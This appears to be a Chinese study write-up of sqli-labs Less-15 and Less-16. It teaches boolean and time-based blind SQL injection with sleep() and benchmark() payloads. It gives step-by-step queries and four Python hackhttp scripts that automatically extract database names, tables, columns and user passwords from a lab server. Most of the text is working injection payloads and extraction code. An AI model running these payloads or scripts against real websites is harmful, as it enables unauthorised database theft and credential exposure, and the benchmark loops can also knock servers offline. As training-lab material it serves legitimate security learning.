之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象
布尔/延时型盲注
函数讲解
布尔型盲注
四种方法讲解:
- left()
- ascii()、substr()
- regexp
- ord()、mid()
其中:
- left(string,2)=’sa’: string 的前两位等于sa
- ascii(substr(string,2,1))=102: string的第二位开始的后一位的ascii码为 102
- table_name regexp ‘\^us[a-z]’:table_name 是以 us 为开头的
- ord(mid(string,2,1))=68: stringd的第二位开始的后一位的十六进制为 68
示例
left()
admin’ and left((要注入的语句),1)=’xxx’#
admin’and left((select database() limit 0,1),1)=’s’#
ascii(substr())=xxx //二进制
admin’ and ascii(substr((要注入的语句),0,1))=102#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101#
xxxx regexp ‘\^us[a-z]’
admin’ and ((要注入的语句) regexp ‘\^se’ limit 0,1)#
admin’ and (select database() regexp ‘\^se’ limit 0,1)#
ord(mid())=xxx // 十六进制
admin’ and ord(mid((select username from security.users limit 0,1),1,1))=68#
admin’ and ord(mid((select password from security.users limit 0,1),1,1))=68#
ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。 cast(字段名 as 转换的类型 )
admin’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68#
admin’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68#
延时型盲注
利用 sleep() 函数进行注入
?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring(database(),1,1)=char(115),sleep(5),1)),2,3#
?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),sleep(5),1)),2,3#
当错误的时候会有5 秒的时间延时。
利用 benchmark()进行延时注入
?id=1’ and (select 1 from (select concat((ascii(substr((要执行的语句),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#
?id=1’ union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#
?id=1’ and (select 1 from (select concat((ascii(substr((database()),1,1))=115),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and (select 1 from (select concat((select username from security.users limit 0,1),benchmark(50000000,encode(‘msg’,’key’)))x from information_schema.tables group by x)a)#
?id=1’ and if(ascii(substr(benchmark(50000000,encode(‘msg’,’key’)),1,1))=115,sleep(5),1)#
?id=1’ union select (if(substring((select database() limit 0,1),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2,3#
当结果正确的时候,运行encode(‘msg’,’key’)操作50000000 次,会占用一段时间。
benchmark()函数,可以测试某些特定操作的执行速度。该函数只是简单地返回服务器执行表达式的时间,而不会涉及分析和优化的开销。
MySQL 字符串截取函数:left(), right(), substring(), substring_index(), mid(), substr()。其中 mid(), substr() 等价于 substring() 函数
encode() 对字符进行加密运算 mysql加密解密方式用法 encode()、decode()
Less-15 布尔/延时型盲注-单引号
测试
在 username 输入 1'or 1=1# 在 password 输入 任意 admin' order by 2 //登录成功 admin' order by 3 //登录失败
使用布尔型注入,但是没有报错信息,没有可供脚本抓取的关键字,只好手工注入了。
猜数据库名
admin’ and left((要注入的语句),1)=’xxx’#
admin’and left((select database() limit 0,1),1)=’s’#
admin’and left((select database() limit 0,1),2)=’se’#
admin’and left((select database() limit 0,1),3)=’sec’#
admin’and left((select database() limit 0,1),8)=’security’#
结果为 security
猜表名
admin’ and ascii(substr((要注入的语句),0,1))=102#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),2,1))=109#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),3,1))=97#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101#
admin’ and ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=102#
结果为: emails referers uagents users
猜列名
admin’ and ((要注入的语句) regexp ‘\^se’ limit 0,1)#
admin’ and (select database() regexp ‘\^se’ limit 0,1)#
admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^u’ limit 0,1)#
admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^us’ limit 0,1)#
admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^use’ limit 0,1)#
admin’ and (select 1 from information_schema.columns where table_name=’users’ and column_name regexp ‘\^username’ limit 0,1)#
结果为 id last password username
猜数据
ifnull(expr1,expr2),含义是:如果第一个参数不为空,则返回第一个参数,否则返回第二个参数。 cast(字段名 as 转换的类型 )
admin’ and ord(mid((select ifnull(cast(username as char),0x20)from security.users order by id limit 0,1),1,1))=68#
admin’ and ord(mid((select ifnull(cast(password as char),0x20)from security.users order by id limit 0,1),1,1))=68#
admin’ and ord(mid((select username from security.users limit 0,1),1,1))=68#
admin’ and ord(mid((select password from security.users limit 0,1),1,1))=68#
结果为
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
函数讲解 Less-16 布尔/延时型盲注-双引号
测试
在 username 输入 admin') or 1=1# 在 password 输入 任意 admin") order by 2# //登录成功 admin") order by 3# //登录失败 使用延时注入,可以使用脚本
猜数据库名
admin”) and if(ascii(substr((select database() limit 0,1),1,1))=115,sleep(5),1)#
admin”) and if(ascii(substr((select database() limit 0,1),2,1))=101,sleep(5),1)#
admin”) and if(ascii(substr((select database() limit 0,1),3,1))=99, sleep(5),1)#
结果为 security
运行脚本
# -*- coding: utf-8 -*- # filename:Less16-1 database_name.py import hackhttp import re import time def database_name(arg): print "database_name start test..." database_name="" database_name="" for k in range(5): for i in range(1,10): for j in range(65,122): startTime=time.time() hh = hackhttp.hackhttp() post = 'uname=admin")and if(ascii(substr((select database() limit {k},1),{i},1))={j},sleep(5),1) #&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg,post) if time.time() - startTime > 5: database_name+=chr(j) print "第%s个数据库的第%s位的ASCII码值是%s" % (k+1,i,j) break database_name+=" " print "security 数据库名为: {database_name}".format(database_name=database_name) if __name__ == '__main__': database_name('http://10.10.10.130/sqli-labs/Less-16/')
猜表名
admin”) and if(ascii(substr((要执行的语句),1,1))=xxx,sleep(5),1)
admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))=114,sleep(5),1)#
admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=”security” limit 1,1),2,1))=101,sleep(5),1)#
admin”) and if(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),3,1))=102,sleep(5),1)#
结果为 emails referers uagents users
执行脚本
# -*- coding: utf-8 -*- # filename:Less16-2 table_name.py import hackhttp import re import time def table_name(arg): print "table_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') table_name="" for k in range(5): for i in range(1,10): for j in range(65,122): startTime=time.time() hh = hackhttp.hackhttp() post = 'uname=admin") and if(ascii(substr((select table_name from information_schema.tables where table_schema="security" limit {k},1),{i},1))={j},sleep(5),1)#&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg,post) count = re.findall("You are in",body) if time.time() - startTime > 5: table_name+=chr(j) print "第%s个表的第%s位的ASCII码值是%s" % (k+1,i,j) break table_name+=" " print "security 数据库的表名为: {table_name}".format(table_name=table_name) if __name__ == '__main__': table_name('http://10.10.10.130/sqli-labs/Less-16/')
猜列名
admin”) and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#
admin”) union select (if(substring((要执行的语句),1,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),1)),2#
admin”) union select (if(substring((select column_name from information_schema.columns where table_name=”users” limit 0,1),1,1)=char(117),benchmark(50000000,encode(“msg”,”key”)),null)),2#
admin”) union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),2,1)=char(115),benchmark(50000000,encode(‘msg’,’key’)),null)),2#
admin”) union select (if(substring((select column_name from information_schema.columns where table_name=’users’ limit 0,1),3,1)=char(101),benchmark(50000000,encode(‘msg’,’key’)),null)),2#
结果为:user_id first_nam last_name user password
运行脚本
# 跑脚本太耗服务器资源了,每次都跑不完就无响应断开连接了(服务器 down 了)。 # -*- coding: utf-8 -*- # filename:Less16-3 column_name.py import hackhttp import re import time def column_name(arg): print "column_name start test..." payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') column_name="" for k in range(5): for i in range(1,10): for j in range(65,122): startTime=time.time() hh = hackhttp.hackhttp() post = 'uname=admin") union select (if(substring((select column_name from information_schema.columns where table_name="users" limit {k},1),{i},1)=char({j}),benchmark(50000000,encode("msg","key")),null)),2#&passwd=aaa&submit=Submit'.format(k=k,i=i,j=j) code, head, body, redirect_url, log = hh.http(arg,post) #count = re.findall("You are in",body) if time.time() - startTime > 5: column_name+=chr(j) print "第%s个列的第%s位的ASCII码值是%s" % (k+1,i,j) break column_name+=" " print "security 数据库的 user 表的列名为: {column_name}".format(column_name=column_name) if __name__ == '__main__': column_name('http://10.10.10.130/sqli-labs/Less-16/')
猜数据
admin”) and if(ascii(substr((要执行的语句),1,1))=115,benchmark(50000000,encode(‘msg’,’key’)),1)#
admin”) and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,benchmark(50000000,encode(‘msk’,’key’)),1)#
admin”) and if(ascii(substr((select username from security.users limit 0,1),2,1))=117,benchmark(50000000,encode(‘msg’,’key’)),1)#
admin”) and if(ascii(substr((select username from security.users limit 0,1),3,1))=109,benchmark(50000000,encode(‘msg’,’key’)),1)#
结果为:
username: Dumb Angelina Dummy secure stupid superman batman admin admin admin password: Dumb Ikillyo pssword crappy stupidity genious moble admin admin admin
执行脚本
# 跑脚本太耗服务器资源了,每次都跑不完就无响应断开连接了(服务器 down 了)。
# -*- coding: utf-8 -*-
# filename:Less16-4 data.py
import hackhttp
import re
import time
def data(arg):
print "data start test..."
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.-+*/')
payload2 = ['username','password']
data="username: "
for k in payload2: # 两个列名
for x in range(10): # 每个列假设十个数据
for i in range(1,10): # 每个数据的第i位的值匹配j
for j in range(65,122): #
startTime=time.time()
hh = hackhttp.hackhttp()
post = 'uname=admin") and if(ascii(substr((select {k} from security.users limit {x},1),{i},1))={j},benchmark(50000000,encode("msg","key")),1)#&passwd=aaa&submit=Submit'.format(k=k,x=x,i=i,j=j)
code, head, body, redirect_url, log = hh.http(arg,post)
count = re.findall("You are in",body)
if time.time() - startTime > 5:
data+=chr(j)
print "%s列的第%s个数据的第%s位的ASCII码值是%s" % (k,x+1,i,j)
break
data += "\t"
print "{data}".format(data=data)
data += "\npassword: "
if __name__ == '__main__':
data('http://10.10.10.130/sqli-labs/Less-16/')